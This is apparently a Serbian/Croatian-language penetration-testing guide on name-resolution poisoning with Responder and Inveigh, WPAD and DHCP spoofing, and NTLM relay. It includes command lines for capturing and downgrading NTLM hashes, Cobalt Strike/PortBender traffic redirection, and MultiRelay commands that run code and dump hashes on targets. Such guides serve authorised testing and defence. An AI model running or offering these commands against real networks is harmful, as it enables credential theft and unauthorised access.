Mrežni protokoli

Protokoli lokalne rezolucije domaćina

• LLMNR, NBT-NS i mDNS:

• Microsoft i drugi operativni sistemi koriste LLMNR i NBT-NS za lokalnu rezoluciju imena kada DNS ne uspe. Slično tome, Apple i Linux sistemi koriste mDNS.

• Ovi protokoli su podložni presretanju i lažiranju zbog svoje neautentifikovane, emitovane prirode preko UDP-a.

• Responder se može koristiti za lažiranje usluga slanjem lažiranih odgovora na upite ovih protokola.

• Dodatne informacije o lažiranju usluga pomoću Responder-a mogu se pronaći ovde.

Protokol automatskog otkrivanja veb proksija (WPAD)

• WPAD omogućava pregledačima automatsko otkrivanje podešavanja proksija.

• Otkrivanje se olakšava putem DHCP-a, DNS-a ili prelaska na LLMNR i NBT-NS ako DNS ne uspe.

• Responder može automatizovati napade na WPAD, usmeravajući klijente ka zlonamernim WPAD serverima.

Responder za trovanje protokola

• Responder je alat koji se koristi za trovanje LLMNR, NBT-NS i mDNS upita, selektivno odgovarajući na osnovu tipova upita, uglavnom ciljajući SMB usluge.

• Dolazi preinstaliran u Kali Linux-u, konfigurabilan na lokaciji /etc/responder/Responder.conf.

• Responder prikazuje uhvaćene hešove na ekranu i čuva ih u direktorijumu /usr/share/responder/logs.

• Podržava IPv4 i IPv6.

• Windows verzija Responder-a je dostupna ovde.

Pokretanje Responder-a

• Za pokretanje Responder-a sa podrazumevanim podešavanjima: responder -I <Interfejs>

• Za agresivnije ispitivanje (sa potencijalnim sporednim efektima): responder -I <Interfejs> -P -r -v

• Tehnike za hvatanje NTLMv1 izazova/odgovora radi lakšeg pucanja: responder -I <Interfejs> --lm --disable-ess

• Lažiranje WPAD-a se može aktivirati sa: responder -I <Interfejs> --wpad

• NetBIOS zahtevi mogu biti rešeni na IP napadača, a može se postaviti i proksi za autentifikaciju: responder.py -I <interfejs> -Pv

Trovanje DHCP-om pomoću Responder-a

• Lažiranje DHCP odgovora može trajno otrovati informacije o rutiranju žrtve, nudeći prikriveniju alternativu za trovanje ARP-om.

• Zahteva precizno poznavanje konfiguracije ciljne mreže.

• Pokretanje napada: ./Responder.py -I eth0 -Pdv

• Ova metoda može efikasno uhvatiti NTLMv1/2 hešove, ali zahteva pažljivo rukovanje kako bi se izbeglo ometanje mreže.

Hvatanje akreditacija pomoću Responder-a

• Responder će lažirati usluge koristeći gorenavedene protokole, hvatajući akreditacije (obično NTLMv2 Izazov/Odgovor) kada korisnik pokuša da se autentifikuje protiv lažiranih usluga.

• Mogu se preduzeti pokušaji da se smanji na NetNTLMv1 ili onemogući ESS radi lakšeg pucanja akreditacija.

Važno je napomenuti da se ove tehnike trebaju primenjivati legalno i etički, uz obezbeđivanje odgovarajuće autorizacije i izbegavanje ometanja ili neovlašćenog pristupa.

Inveigh

Inveigh je alat namenjen penetracionim testiranjima i timovima za crveno hakovanje, dizajniran za Windows sisteme. Nudi funkcionalnosti slične Responder-u, izvodeći lažiranje i napade čovek-u-sredini. Alat se razvio iz PowerShell skripte u C# binarni fajl, sa Inveigh i InveighZero kao glavnim verzijama. Detaljni parametri i uputstva mogu se pronaći u wiki-ju.

Inveigh se može koristiti putem PowerShell-a:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ili izvršeno kao C# binarni fajl:

Inveigh.exe

NTLM Relay Napad

Ovaj napad koristi SMB autentifikacijske sesije kako bi pristupio ciljnom računalu, pružajući sistemsku ljusku ako je uspješan. Ključni preduvjeti uključuju:

• Autentificirani korisnik mora imati lokalni administratorski pristup na preusmjerenom računalu.

• Potrebno je onemogućiti SMB potpisivanje.

Preusmjeravanje i tuneliranje porta 445

U scenarijima gdje direktno umrežavanje nije izvedivo, promet na portu 445 treba biti preusmjeren i tuneliran. Alati poput PortBender pomažu u preusmjeravanju prometa na portu 445 na drugi port, što je bitno kada je dostupan lokalni administratorski pristup za učitavanje upravljačkog programa.

Postavljanje i rad PortBendera u Cobalt Strike-u:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Ostali alati za NTLM Relay napad

• Metasploit: Podesite sa proxy-jima, lokalnim i udaljenim detaljima hosta.

• smbrelayx: Python skripta za preusmeravanje SMB sesija i izvršavanje komandi ili postavljanje zadnjih vrata.

• MultiRelay: Alat iz Responder suite-a za preusmeravanje određenih korisnika ili svih korisnika, izvršavanje komandi ili ispisivanje heševa.

Svaki alat se može konfigurisati da radi preko SOCKS proxy-ja ako je potrebno, omogućavajući napade čak i sa indirektnim pristupom mreži.

Rad MultiRelay-a

MultiRelay se pokreće iz direktorijuma /usr/share/responder/tools, ciljajući određene IP adrese ili korisnike.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Ovi alati i tehnike čine sveobuhvatan set za izvođenje NTLM Relay napada u različitim mrežnim okruženjima.

Prisiljavanje NTLM prijava

U sustavu Windows možete prisiliti neke privilegirane račune da se autentificiraju na proizvoljnim mašinama. Pročitajte sljedeću stranicu da biste saznali kako:

Reference

• https://intrinium.com/smb-relay-attack-tutorial/

• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

• https://intrinium.com/smb-relay-attack-tutorial/

• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html